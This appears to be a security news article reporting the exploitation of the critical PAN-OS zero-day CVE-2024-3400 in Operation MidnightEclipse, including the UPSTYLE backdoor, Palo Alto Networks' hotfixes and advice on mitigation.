Palo Alto Networks Zero-Day Flaw Exploited in Targeted Attacks

Written by

Palo Alto Networks has detected targeted assaults exploiting a recently unearthed critical zero-day vulnerability within its PAN-OS software, designated CVE-2024-3400 with a CVSS score of 10.0. 

This flaw enables unauthorized actors to execute arbitrary code with root privileges on affected firewalls. Identified as Operation MidnightEclipse, these targeted attacks have been closely monitored following the discovery of the vulnerability.

The vulnerability affects firewalls running PAN-OS 10.2, 11.0 and 11.1 and configured with specific features enabled.

In an advisory published last Friday, Palo Alto Networks confirmed targeted attacks leveraging this flaw, attributing known exploitation to a single threat actor while acknowledging the potential for future exploitation by additional actors.

Operation MidnightEclipse encompasses post-exploitation activities, including the deployment of a Python-based backdoor named UPSTYLE via a cronjob executing commands remotely every minute. 

In their advisory, Palo Alto Networks has shared detailed insights into the backdoor’s behavior, including its persistence mechanisms, command execution and cleanup processes.

“Anytime a vulnerability impacts devices directly connected to the Internet, it’s a cause for concern. The fact that these are being actively exploited makes this additionally troublesome,” warned Erich Kron, security awareness advocate at KnowBe4.

“Organizations with vulnerable versions of the operating system should take immediate actions to mitigate the threat by disabling features related to the vulnerability [...] while keeping a vigilant watch for potential malicious network traffic or code execution on the devices.”

To address the issue, Palo Alto Networks advised users to apply hotfixes released on Sunday for affected PAN-OS versions and enable specific threat prevention measures. The company is also offering its Unit 42 Managed Threat Hunting XQL queries to help identify signs of exploitation within network logs.

Gratitude is extended to Volexity for discovering the vulnerability, highlighting the significance of collaboration in combating cybersecurity threats. 

Read more on this vulnerability: Palo Alto Networks Warns About Critical Zero-Day in PAN-OS

Image credit: Tada Images /

What’s hot on Infosecurity Magazine?